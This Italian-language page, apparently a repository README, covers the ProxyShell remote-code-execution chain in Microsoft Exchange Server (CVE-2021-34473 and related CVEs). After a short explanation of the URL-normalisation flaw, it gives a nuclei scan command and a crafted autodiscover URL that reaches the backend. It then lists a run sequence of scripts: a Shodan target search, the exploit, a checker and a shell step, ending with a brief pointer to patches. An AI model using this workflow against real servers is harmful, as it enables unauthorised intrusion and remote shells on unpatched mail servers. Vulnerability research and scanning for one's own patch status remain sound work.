
CVE-2021-34473 Vulnerabilità di esecuzione remota di codice di Microsoft Exchange Server
CVE-2021-34473 Vulnerabilità di esecuzione remota di codice su Microsoft Exchange Server. Questa errata normalizzazione degli URL ci permette di accedere a un URL arbitrario del backend mentre siamo eseguiti come account macchina del server Exchange. Sebbene questo bug non sia potente come l'SSRF in ProxyLogon, e potessimo manipolare solo la parte del percorso dell'URL, è comunque abbastanza potente per condurre ulteriori attacchi con accesso arbitrario al backend.
Scanner nuclei per ProxyShell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207) scoperto da orange tsai al Pwn2Own, che colpisce Microsoft Exchange Server.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Applica gli aggiornamenti di sicurezza disponibili qui: CVE-2021-34473